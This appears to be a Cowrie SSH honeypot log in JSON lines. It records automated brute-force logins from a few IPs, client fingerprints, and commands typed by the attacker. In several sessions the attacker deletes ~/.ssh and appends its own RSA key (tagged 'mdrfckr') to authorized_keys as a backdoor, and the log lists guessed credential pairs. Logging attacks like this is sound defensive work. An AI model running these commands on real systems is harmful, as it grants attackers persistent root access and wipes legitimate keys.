{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:13:29.990976Z","src_ip":"212.227.235.229","session":"9692ed47ba6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:13:30.070397Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:13:30.071240Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:13:30.072221Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:30.348703Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:13:30.958439Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:13:30.959190Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:13:31.236063Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:31.236913Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33422,"dst_ip":"1.2.3.4","dst_port":22,"session":"f82195ab0edf","protocol":"ssh","message":"New connection: 212.227.235.229:33422 (1.2.3.4:22) [session: f82195ab0edf]","sensor":"my-vps","timestamp":"2025-08-31T05:13:31.507892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:31.508784Z","src_ip":"212.227.235.229","session":"f82195ab0edf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:31.780778Z","src_ip":"212.227.235.229","session":"f82195ab0edf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:13:32.912367Z","src_ip":"212.227.235.229","session":"f82195ab0edf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:13:33.962351Z","src_ip":"212.227.235.229","session":"109cd9742703"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:13:33.964914Z","src_ip":"212.227.235.229","session":"109cd9742703"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:34.186483Z","src_ip":"212.227.235.229","session":"f82195ab0edf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34530,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3881e6b65a6","protocol":"ssh","message":"New connection: 212.227.235.229:34530 (1.2.3.4:22) [session: e3881e6b65a6]","sensor":"my-vps","timestamp":"2025-08-31T05:13:34.458827Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:34.459693Z","src_ip":"212.227.235.229","session":"e3881e6b65a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:34.732386Z","src_ip":"212.227.235.229","session":"e3881e6b65a6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:13:35.868397Z","src_ip":"212.227.235.229","session":"e3881e6b65a6"}
{"eventid":"cowrie.login.failed","username":"server","password":"P@ssw0rd123","message":"login attempt [server/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:13:36.048178Z","src_ip":"212.227.235.229","session":"9692ed47ba6c"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:36.142166Z","src_ip":"212.227.235.229","session":"817cfc421231"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:36.143022Z","src_ip":"212.227.235.229","session":"e3881e6b65a6"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:37.920882Z","src_ip":"212.227.235.229","session":"9692ed47ba6c"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-31T05:13:39.235240Z","src_ip":"212.227.125.160","session":"6dc4bc0092f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49276,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa6e3505649a","protocol":"ssh","message":"New connection: 212.227.235.229:49276 (1.2.3.4:22) [session: aa6e3505649a]","sensor":"my-vps","timestamp":"2025-08-31T05:13:39.479397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:39.489129Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:39.748043Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.login.success","username":"root","password":"111888","message":"login attempt [root/111888] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:13:40.791650Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:13:41.330411Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:13:41.331157Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:13:41.332357Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:41.602541Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:13:42.572768Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:13:42.573487Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:13:42.837287Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:42.838414Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50714,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa8155142334","protocol":"ssh","message":"New connection: 212.227.235.229:50714 (1.2.3.4:22) [session: fa8155142334]","sensor":"my-vps","timestamp":"2025-08-31T05:13:43.089039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:43.092711Z","src_ip":"212.227.235.229","session":"fa8155142334"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:43.351574Z","src_ip":"212.227.235.229","session":"fa8155142334"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:13:44.396012Z","src_ip":"212.227.235.229","session":"fa8155142334"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:45.661273Z","src_ip":"212.227.235.229","session":"fa8155142334"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51860,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d853cfdf782","protocol":"ssh","message":"New connection: 212.227.235.229:51860 (1.2.3.4:22) [session: 3d853cfdf782]","sensor":"my-vps","timestamp":"2025-08-31T05:13:45.908547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:45.917262Z","src_ip":"212.227.235.229","session":"3d853cfdf782"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:13:46.164784Z","src_ip":"212.227.235.229","session":"3d853cfdf782"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:13:47.165720Z","src_ip":"212.227.235.229","session":"3d853cfdf782"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:47.421852Z","src_ip":"212.227.235.229","session":"3d853cfdf782"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:13:47.427111Z","src_ip":"212.227.235.229","session":"aa6e3505649a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48822,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5a8fe3099d4","protocol":"ssh","message":"New connection: 212.227.235.229:48822 (1.2.3.4:22) [session: d5a8fe3099d4]","sensor":"my-vps","timestamp":"2025-08-31T05:13:47.785588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:13:47.786747Z","src_ip":"212.227.235.229","session":"d5a8fe3099d4"}
